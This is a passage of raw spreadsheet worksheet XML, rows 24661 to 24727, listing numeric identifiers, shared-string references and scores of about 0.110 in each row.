        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24661" ht="15.75" customHeight="1">
      <c r="A24661" s="1">
        <v>27768.0</v>
      </c>
      <c r="B24661" s="2">
        <v>2.3111251E7</v>
      </c>
      <c r="C24661" s="2" t="s">
        <v>23741</v>
      </c>
      <c r="D24661" s="2">
        <v>1.0</v>
      </c>
      <c r="E24661" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24661" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24662" ht="15.75" customHeight="1">
      <c r="A24662" s="1">
        <v>27914.0</v>
      </c>
      <c r="B24662" s="2">
        <v>2.3731786E7</v>
      </c>
      <c r="C24662" s="2" t="s">
        <v>23742</v>
      </c>
      <c r="D24662" s="2">
        <v>1.0</v>
      </c>
      <c r="E24662" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24662" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24663" ht="15.75" customHeight="1">
      <c r="A24663" s="1">
        <v>28625.0</v>
      </c>
      <c r="B24663" s="2">
        <v>2.71738E7</v>
      </c>
      <c r="C24663" s="2" t="s">
        <v>23743</v>
      </c>
      <c r="D24663" s="2">
        <v>1.0</v>
      </c>
      <c r="E24663" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24663" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24664" ht="15.75" customHeight="1">
      <c r="A24664" s="1">
        <v>29033.0</v>
      </c>
      <c r="B24664" s="2">
        <v>3.0131207E7</v>
      </c>
      <c r="C24664" s="2" t="s">
        <v>23721</v>
      </c>
      <c r="D24664" s="2">
        <v>1.0</v>
      </c>
      <c r="E24664" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24664" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24665" ht="15.75" customHeight="1">
      <c r="A24665" s="1">
        <v>29662.0</v>
      </c>
      <c r="B24665" s="2">
        <v>3.3908488E7</v>
      </c>
      <c r="C24665" s="2" t="s">
        <v>23744</v>
      </c>
      <c r="D24665" s="2">
        <v>1.0</v>
      </c>
      <c r="E24665" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24665" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24666" ht="15.75" customHeight="1">
      <c r="A24666" s="1">
        <v>29959.0</v>
      </c>
      <c r="B24666" s="2">
        <v>3607688.0</v>
      </c>
      <c r="C24666" s="2" t="s">
        <v>23745</v>
      </c>
      <c r="D24666" s="2">
        <v>1.0</v>
      </c>
      <c r="E24666" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24666" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24667" ht="15.75" customHeight="1">
      <c r="A24667" s="1">
        <v>30033.0</v>
      </c>
      <c r="B24667" s="2">
        <v>3620111.0</v>
      </c>
      <c r="C24667" s="2" t="s">
        <v>23746</v>
      </c>
      <c r="D24667" s="2">
        <v>1.0</v>
      </c>
      <c r="E24667" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24667" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24668" ht="15.75" customHeight="1">
      <c r="A24668" s="1">
        <v>30199.0</v>
      </c>
      <c r="B24668" s="2">
        <v>3.7276999E7</v>
      </c>
      <c r="C24668" s="2" t="s">
        <v>23747</v>
      </c>
      <c r="D24668" s="2">
        <v>1.0</v>
      </c>
      <c r="E24668" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24668" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24669" ht="15.75" customHeight="1">
      <c r="A24669" s="1">
        <v>30362.0</v>
      </c>
      <c r="B24669" s="2">
        <v>3.8361128E7</v>
      </c>
      <c r="C24669" s="2" t="s">
        <v>23748</v>
      </c>
      <c r="D24669" s="2">
        <v>1.0</v>
      </c>
      <c r="E24669" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24669" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24670" ht="15.75" customHeight="1">
      <c r="A24670" s="1">
        <v>30508.0</v>
      </c>
      <c r="B24670" s="2">
        <v>4.0059968E7</v>
      </c>
      <c r="C24670" s="2" t="s">
        <v>23749</v>
      </c>
      <c r="D24670" s="2">
        <v>1.0</v>
      </c>
      <c r="E24670" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24670" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24671" ht="15.75" customHeight="1">
      <c r="A24671" s="1">
        <v>30639.0</v>
      </c>
      <c r="B24671" s="2">
        <v>4.1581086E7</v>
      </c>
      <c r="C24671" s="2" t="s">
        <v>23750</v>
      </c>
      <c r="D24671" s="2">
        <v>1.0</v>
      </c>
      <c r="E24671" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24671" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24672" ht="15.75" customHeight="1">
      <c r="A24672" s="1">
        <v>30721.0</v>
      </c>
      <c r="B24672" s="2">
        <v>4.3483441E7</v>
      </c>
      <c r="C24672" s="2" t="s">
        <v>23751</v>
      </c>
      <c r="D24672" s="2">
        <v>1.0</v>
      </c>
      <c r="E24672" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24672" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24673" ht="15.75" customHeight="1">
      <c r="A24673" s="1">
        <v>31296.0</v>
      </c>
      <c r="B24673" s="2">
        <v>4.9658195E7</v>
      </c>
      <c r="C24673" s="2" t="s">
        <v>23752</v>
      </c>
      <c r="D24673" s="2">
        <v>1.0</v>
      </c>
      <c r="E24673" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24673" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24674" ht="15.75" customHeight="1">
      <c r="A24674" s="1">
        <v>32017.0</v>
      </c>
      <c r="B24674" s="2">
        <v>5.348959E7</v>
      </c>
      <c r="C24674" s="2" t="s">
        <v>23753</v>
      </c>
      <c r="D24674" s="2">
        <v>1.0</v>
      </c>
      <c r="E24674" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24674" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24675" ht="15.75" customHeight="1">
      <c r="A24675" s="1">
        <v>32088.0</v>
      </c>
      <c r="B24675" s="2">
        <v>5.3940559E7</v>
      </c>
      <c r="C24675" s="2" t="s">
        <v>23754</v>
      </c>
      <c r="D24675" s="2">
        <v>1.0</v>
      </c>
      <c r="E24675" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24675" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24676" ht="15.75" customHeight="1">
      <c r="A24676" s="1">
        <v>32659.0</v>
      </c>
      <c r="B24676" s="2">
        <v>5910981.0</v>
      </c>
      <c r="C24676" s="2" t="s">
        <v>23755</v>
      </c>
      <c r="D24676" s="2">
        <v>1.0</v>
      </c>
      <c r="E24676" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24676" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24677" ht="15.75" customHeight="1">
      <c r="A24677" s="1">
        <v>33402.0</v>
      </c>
      <c r="B24677" s="2">
        <v>7713638.0</v>
      </c>
      <c r="C24677" s="2" t="s">
        <v>23756</v>
      </c>
      <c r="D24677" s="2">
        <v>1.0</v>
      </c>
      <c r="E24677" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24677" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24678" ht="15.75" customHeight="1">
      <c r="A24678" s="1">
        <v>33409.0</v>
      </c>
      <c r="B24678" s="2">
        <v>7731486.0</v>
      </c>
      <c r="C24678" s="2" t="s">
        <v>23757</v>
      </c>
      <c r="D24678" s="2">
        <v>1.0</v>
      </c>
      <c r="E24678" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24678" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24679" ht="15.75" customHeight="1">
      <c r="A24679" s="1">
        <v>33411.0</v>
      </c>
      <c r="B24679" s="2">
        <v>7736974.0</v>
      </c>
      <c r="C24679" s="2" t="s">
        <v>23758</v>
      </c>
      <c r="D24679" s="2">
        <v>1.0</v>
      </c>
      <c r="E24679" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24679" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24680" ht="15.75" customHeight="1">
      <c r="A24680" s="1">
        <v>33521.0</v>
      </c>
      <c r="B24680" s="2">
        <v>8095719.0</v>
      </c>
      <c r="C24680" s="2" t="s">
        <v>23759</v>
      </c>
      <c r="D24680" s="2">
        <v>1.0</v>
      </c>
      <c r="E24680" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24680" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24681" ht="15.75" customHeight="1">
      <c r="A24681" s="1">
        <v>33874.0</v>
      </c>
      <c r="B24681" s="2">
        <v>9110522.0</v>
      </c>
      <c r="C24681" s="2" t="s">
        <v>23760</v>
      </c>
      <c r="D24681" s="2">
        <v>1.0</v>
      </c>
      <c r="E24681" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24681" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24682" ht="15.75" customHeight="1">
      <c r="A24682" s="1">
        <v>33920.0</v>
      </c>
      <c r="B24682" s="2">
        <v>9265506.0</v>
      </c>
      <c r="C24682" s="2" t="s">
        <v>23761</v>
      </c>
      <c r="D24682" s="2">
        <v>1.0</v>
      </c>
      <c r="E24682" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24682" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24683" ht="15.75" customHeight="1">
      <c r="A24683" s="1">
        <v>33945.0</v>
      </c>
      <c r="B24683" s="2">
        <v>9290233.0</v>
      </c>
      <c r="C24683" s="2" t="s">
        <v>23762</v>
      </c>
      <c r="D24683" s="2">
        <v>1.0</v>
      </c>
      <c r="E24683" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24683" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24684" ht="15.75" customHeight="1">
      <c r="A24684" s="1">
        <v>34057.0</v>
      </c>
      <c r="B24684" s="2">
        <v>9595617.0</v>
      </c>
      <c r="C24684" s="2" t="s">
        <v>23763</v>
      </c>
      <c r="D24684" s="2">
        <v>1.0</v>
      </c>
      <c r="E24684" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24684" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24685" ht="15.75" customHeight="1">
      <c r="A24685" s="1">
        <v>12647.0</v>
      </c>
      <c r="B24685" s="2">
        <v>3.0373775E7</v>
      </c>
      <c r="C24685" s="2" t="s">
        <v>23764</v>
      </c>
      <c r="D24685" s="2">
        <v>1.0</v>
      </c>
      <c r="E24685" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24685" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24686" ht="15.75" customHeight="1">
      <c r="A24686" s="1">
        <v>14713.0</v>
      </c>
      <c r="B24686" s="2">
        <v>4.0623844E7</v>
      </c>
      <c r="C24686" s="2" t="s">
        <v>23765</v>
      </c>
      <c r="D24686" s="2">
        <v>1.0</v>
      </c>
      <c r="E24686" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24686" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24687" ht="15.75" customHeight="1">
      <c r="A24687" s="1">
        <v>16990.0</v>
      </c>
      <c r="B24687" s="2">
        <v>4.8356358E7</v>
      </c>
      <c r="C24687" s="2" t="s">
        <v>23766</v>
      </c>
      <c r="D24687" s="2">
        <v>1.0</v>
      </c>
      <c r="E24687" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24687" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24688" ht="15.75" customHeight="1">
      <c r="A24688" s="1">
        <v>20043.0</v>
      </c>
      <c r="B24688" s="2">
        <v>7771898.0</v>
      </c>
      <c r="C24688" s="2" t="s">
        <v>23767</v>
      </c>
      <c r="D24688" s="2">
        <v>1.0</v>
      </c>
      <c r="E24688" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24688" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24689" ht="15.75" customHeight="1">
      <c r="A24689" s="1">
        <v>20080.0</v>
      </c>
      <c r="B24689" s="2">
        <v>9134806.0</v>
      </c>
      <c r="C24689" s="2" t="s">
        <v>23768</v>
      </c>
      <c r="D24689" s="2">
        <v>1.0</v>
      </c>
      <c r="E24689" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24689" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24690" ht="15.75" customHeight="1">
      <c r="A24690" s="1">
        <v>20717.0</v>
      </c>
      <c r="B24690" s="2">
        <v>1.4629302E7</v>
      </c>
      <c r="C24690" s="2" t="s">
        <v>6841</v>
      </c>
      <c r="D24690" s="2">
        <v>1.0</v>
      </c>
      <c r="E24690" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24690" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24691" ht="15.75" customHeight="1">
      <c r="A24691" s="1">
        <v>21063.0</v>
      </c>
      <c r="B24691" s="2">
        <v>1.7803592E7</v>
      </c>
      <c r="C24691" s="2" t="s">
        <v>23381</v>
      </c>
      <c r="D24691" s="2">
        <v>1.0</v>
      </c>
      <c r="E24691" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24691" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24692" ht="15.75" customHeight="1">
      <c r="A24692" s="1">
        <v>27595.0</v>
      </c>
      <c r="B24692" s="2">
        <v>2.2571829E7</v>
      </c>
      <c r="C24692" s="2" t="s">
        <v>23769</v>
      </c>
      <c r="D24692" s="2">
        <v>1.0</v>
      </c>
      <c r="E24692" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24692" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24693" ht="15.75" customHeight="1">
      <c r="A24693" s="1">
        <v>28174.0</v>
      </c>
      <c r="B24693" s="2">
        <v>2.4982864E7</v>
      </c>
      <c r="C24693" s="2" t="s">
        <v>17633</v>
      </c>
      <c r="D24693" s="2">
        <v>1.0</v>
      </c>
      <c r="E24693" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24693" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24694" ht="15.75" customHeight="1">
      <c r="A24694" s="1">
        <v>28399.0</v>
      </c>
      <c r="B24694" s="2">
        <v>2.6268096E7</v>
      </c>
      <c r="C24694" s="2" t="s">
        <v>23770</v>
      </c>
      <c r="D24694" s="2">
        <v>1.0</v>
      </c>
      <c r="E24694" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24694" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24695" ht="15.75" customHeight="1">
      <c r="A24695" s="1">
        <v>29493.0</v>
      </c>
      <c r="B24695" s="2">
        <v>3.2576132E7</v>
      </c>
      <c r="C24695" s="2" t="s">
        <v>23771</v>
      </c>
      <c r="D24695" s="2">
        <v>1.0</v>
      </c>
      <c r="E24695" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24695" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24696" ht="15.75" customHeight="1">
      <c r="A24696" s="1">
        <v>29636.0</v>
      </c>
      <c r="B24696" s="2">
        <v>3.3764112E7</v>
      </c>
      <c r="C24696" s="2" t="s">
        <v>23772</v>
      </c>
      <c r="D24696" s="2">
        <v>1.0</v>
      </c>
      <c r="E24696" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24696" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24697" ht="15.75" customHeight="1">
      <c r="A24697" s="1">
        <v>30012.0</v>
      </c>
      <c r="B24697" s="2">
        <v>3.61541E7</v>
      </c>
      <c r="C24697" s="2" t="s">
        <v>23773</v>
      </c>
      <c r="D24697" s="2">
        <v>1.0</v>
      </c>
      <c r="E24697" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24697" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24698" ht="15.75" customHeight="1">
      <c r="A24698" s="1">
        <v>30342.0</v>
      </c>
      <c r="B24698" s="2">
        <v>3.8202176E7</v>
      </c>
      <c r="C24698" s="2" t="s">
        <v>23774</v>
      </c>
      <c r="D24698" s="2">
        <v>1.0</v>
      </c>
      <c r="E24698" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24698" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24699" ht="15.75" customHeight="1">
      <c r="A24699" s="1">
        <v>30874.0</v>
      </c>
      <c r="B24699" s="2">
        <v>4.6306025E7</v>
      </c>
      <c r="C24699" s="2" t="s">
        <v>23775</v>
      </c>
      <c r="D24699" s="2">
        <v>1.0</v>
      </c>
      <c r="E24699" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24699" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24700" ht="15.75" customHeight="1">
      <c r="A24700" s="1">
        <v>31498.0</v>
      </c>
      <c r="B24700" s="2">
        <v>5065720.0</v>
      </c>
      <c r="C24700" s="2" t="s">
        <v>9279</v>
      </c>
      <c r="D24700" s="2">
        <v>1.0</v>
      </c>
      <c r="E24700" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24700" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24701" ht="15.75" customHeight="1">
      <c r="A24701" s="1">
        <v>31751.0</v>
      </c>
      <c r="B24701" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C24701" s="2" t="s">
        <v>23776</v>
      </c>
      <c r="D24701" s="2">
        <v>1.0</v>
      </c>
      <c r="E24701" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24701" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24702" ht="15.75" customHeight="1">
      <c r="A24702" s="1">
        <v>31819.0</v>
      </c>
      <c r="B24702" s="2">
        <v>5252596.0</v>
      </c>
      <c r="C24702" s="2" t="s">
        <v>23643</v>
      </c>
      <c r="D24702" s="2">
        <v>1.0</v>
      </c>
      <c r="E24702" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24702" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24703" ht="15.75" customHeight="1">
      <c r="A24703" s="1">
        <v>31836.0</v>
      </c>
      <c r="B24703" s="2">
        <v>5265611.0</v>
      </c>
      <c r="C24703" s="2" t="s">
        <v>23777</v>
      </c>
      <c r="D24703" s="2">
        <v>1.0</v>
      </c>
      <c r="E24703" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24703" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24704" ht="15.75" customHeight="1">
      <c r="A24704" s="1">
        <v>32172.0</v>
      </c>
      <c r="B24704" s="2">
        <v>5462030.0</v>
      </c>
      <c r="C24704" s="2" t="s">
        <v>23778</v>
      </c>
      <c r="D24704" s="2">
        <v>1.0</v>
      </c>
      <c r="E24704" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24704" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24705" ht="15.75" customHeight="1">
      <c r="A24705" s="1">
        <v>32216.0</v>
      </c>
      <c r="B24705" s="2">
        <v>5.4886633E7</v>
      </c>
      <c r="C24705" s="2" t="s">
        <v>23779</v>
      </c>
      <c r="D24705" s="2">
        <v>1.0</v>
      </c>
      <c r="E24705" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24705" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="24706" ht="15.75" customHeight="1">
      <c r="A24706" s="1">
        <v>23385.0</v>
      </c>
      <c r="B24706" s="2">
        <v>5.5612087E7</v>
      </c>
      <c r="C24706" s="2" t="s">
        <v>23780</v>
      </c>
      <c r="D24706" s="2">
        <v>1.0</v>
      </c>
      <c r="E24706" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24706" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="24707" ht="15.75" customHeight="1">
      <c r="A24707" s="1">
        <v>25060.0</v>
      </c>
      <c r="B24707" s="2">
        <v>1.2868199E7</v>
      </c>
      <c r="C24707" s="2" t="s">
        <v>23781</v>
      </c>
      <c r="D24707" s="2">
        <v>1.0</v>
      </c>
      <c r="E24707" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24707" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="24708" ht="15.75" customHeight="1">
      <c r="A24708" s="1">
        <v>2728.0</v>
      </c>
      <c r="B24708" s="2">
        <v>3.4981542E7</v>
      </c>
      <c r="C24708" s="2" t="s">
        <v>23782</v>
      </c>
      <c r="D24708" s="2">
        <v>1.0</v>
      </c>
      <c r="E24708" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24708" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="24709" ht="15.75" customHeight="1">
      <c r="A24709" s="1">
        <v>3521.0</v>
      </c>
      <c r="B24709" s="2">
        <v>3.8602423E7</v>
      </c>
      <c r="C24709" s="2" t="s">
        <v>23783</v>
      </c>
      <c r="D24709" s="2">
        <v>1.0</v>
      </c>
      <c r="E24709" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24709" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="24710" ht="15.75" customHeight="1">
      <c r="A24710" s="1">
        <v>9106.0</v>
      </c>
      <c r="B24710" s="2">
        <v>5.5167792E7</v>
      </c>
      <c r="C24710" s="2" t="s">
        <v>23784</v>
      </c>
      <c r="D24710" s="2">
        <v>1.0</v>
      </c>
      <c r="E24710" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24710" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="24711" ht="15.75" customHeight="1">
      <c r="A24711" s="1">
        <v>13272.0</v>
      </c>
      <c r="B24711" s="2">
        <v>3.4390621E7</v>
      </c>
      <c r="C24711" s="2" t="s">
        <v>23785</v>
      </c>
      <c r="D24711" s="2">
        <v>1.0</v>
      </c>
      <c r="E24711" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24711" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="24712" ht="15.75" customHeight="1">
      <c r="A24712" s="1">
        <v>18439.0</v>
      </c>
      <c r="B24712" s="2">
        <v>5.2776565E7</v>
      </c>
      <c r="C24712" s="2" t="s">
        <v>23786</v>
      </c>
      <c r="D24712" s="2">
        <v>1.0</v>
      </c>
      <c r="E24712" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24712" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="24713" ht="15.75" customHeight="1">
      <c r="A24713" s="1">
        <v>19653.0</v>
      </c>
      <c r="B24713" s="2">
        <v>5.6339183E7</v>
      </c>
      <c r="C24713" s="2" t="s">
        <v>23787</v>
      </c>
      <c r="D24713" s="2">
        <v>1.0</v>
      </c>
      <c r="E24713" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24713" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="24714" ht="15.75" customHeight="1">
      <c r="A24714" s="1">
        <v>21102.0</v>
      </c>
      <c r="B24714" s="2">
        <v>1.8132694E7</v>
      </c>
      <c r="C24714" s="2" t="s">
        <v>23788</v>
      </c>
      <c r="D24714" s="2">
        <v>1.0</v>
      </c>
      <c r="E24714" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24714" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="24715" ht="15.75" customHeight="1">
      <c r="A24715" s="1">
        <v>23141.0</v>
      </c>
      <c r="B24715" s="2">
        <v>5.1603152E7</v>
      </c>
      <c r="C24715" s="2" t="s">
        <v>23789</v>
      </c>
      <c r="D24715" s="2">
        <v>1.0</v>
      </c>
      <c r="E24715" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24715" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="24716" ht="15.75" customHeight="1">
      <c r="A24716" s="1">
        <v>28927.0</v>
      </c>
      <c r="B24716" s="2">
        <v>2.9545779E7</v>
      </c>
      <c r="C24716" s="2" t="s">
        <v>23790</v>
      </c>
      <c r="D24716" s="2">
        <v>1.0</v>
      </c>
      <c r="E24716" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24716" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="24717" ht="15.75" customHeight="1">
      <c r="A24717" s="1">
        <v>28985.0</v>
      </c>
      <c r="B24717" s="2">
        <v>2.9831593E7</v>
      </c>
      <c r="C24717" s="2" t="s">
        <v>23791</v>
      </c>
      <c r="D24717" s="2">
        <v>1.0</v>
      </c>
      <c r="E24717" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24717" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="24718" ht="15.75" customHeight="1">
      <c r="A24718" s="1">
        <v>29309.0</v>
      </c>
      <c r="B24718" s="2">
        <v>3.1274004E7</v>
      </c>
      <c r="C24718" s="2" t="s">
        <v>23792</v>
      </c>
      <c r="D24718" s="2">
        <v>1.0</v>
      </c>
      <c r="E24718" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24718" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="24719" ht="15.75" customHeight="1">
      <c r="A24719" s="1">
        <v>30774.0</v>
      </c>
      <c r="B24719" s="2">
        <v>4.4633754E7</v>
      </c>
      <c r="C24719" s="2" t="s">
        <v>23793</v>
      </c>
      <c r="D24719" s="2">
        <v>1.0</v>
      </c>
      <c r="E24719" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24719" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="24720" ht="15.75" customHeight="1">
      <c r="A24720" s="1">
        <v>31712.0</v>
      </c>
      <c r="B24720" s="2">
        <v>5210923.0</v>
      </c>
      <c r="C24720" s="2" t="s">
        <v>23794</v>
      </c>
      <c r="D24720" s="2">
        <v>1.0</v>
      </c>
      <c r="E24720" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24720" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="24721" ht="15.75" customHeight="1">
      <c r="A24721" s="1">
        <v>7321.0</v>
      </c>
      <c r="B24721" s="2">
        <v>5.0888087E7</v>
      </c>
      <c r="C24721" s="2" t="s">
        <v>23795</v>
      </c>
      <c r="D24721" s="2">
        <v>1.0</v>
      </c>
      <c r="E24721" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24721" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="24722" ht="15.75" customHeight="1">
      <c r="A24722" s="1">
        <v>20505.0</v>
      </c>
      <c r="B24722" s="2">
        <v>1.2965436E7</v>
      </c>
      <c r="C24722" s="2" t="s">
        <v>23796</v>
      </c>
      <c r="D24722" s="2">
        <v>1.0</v>
      </c>
      <c r="E24722" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24722" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="24723" ht="15.75" customHeight="1">
      <c r="A24723" s="1">
        <v>21348.0</v>
      </c>
      <c r="B24723" s="2">
        <v>2.1239262E7</v>
      </c>
      <c r="C24723" s="2" t="s">
        <v>23797</v>
      </c>
      <c r="D24723" s="2">
        <v>1.0</v>
      </c>
      <c r="E24723" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24723" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="24724" ht="15.75" customHeight="1">
      <c r="A24724" s="1">
        <v>27088.0</v>
      </c>
      <c r="B24724" s="2">
        <v>2.0497934E7</v>
      </c>
      <c r="C24724" s="2" t="s">
        <v>23798</v>
      </c>
      <c r="D24724" s="2">
        <v>1.0</v>
      </c>
      <c r="E24724" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24724" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="24725" ht="15.75" customHeight="1">
      <c r="A24725" s="1">
        <v>29826.0</v>
      </c>
      <c r="B24725" s="2">
        <v>3.5313604E7</v>
      </c>
      <c r="C24725" s="2" t="s">
        <v>23799</v>
      </c>
      <c r="D24725" s="2">
        <v>1.0</v>
      </c>
      <c r="E24725" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24725" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="24726" ht="15.75" customHeight="1">
      <c r="A24726" s="1">
        <v>32866.0</v>
      </c>
      <c r="B24726" s="2">
        <v>6295962.0</v>
      </c>
      <c r="C24726" s="2" t="s">
        <v>23800</v>
      </c>
      <c r="D24726" s="2">
        <v>1.0</v>
      </c>
      <c r="E24726" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24726" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="24727" ht="15.75" customHeight="1">
      <c r="A24727" s="1">
        <v>33265.0</v>
      </c>
      <c r="B24727" s="2">
        <v>7367231.0</v>
      </c>
      <c r="C24727" s="2" t="s">
        <v>23548</v>
      </c>
      <c r="D24727" s="2">
        <v>1.0</v>
      </c>
      <c r="E24727" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24727" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
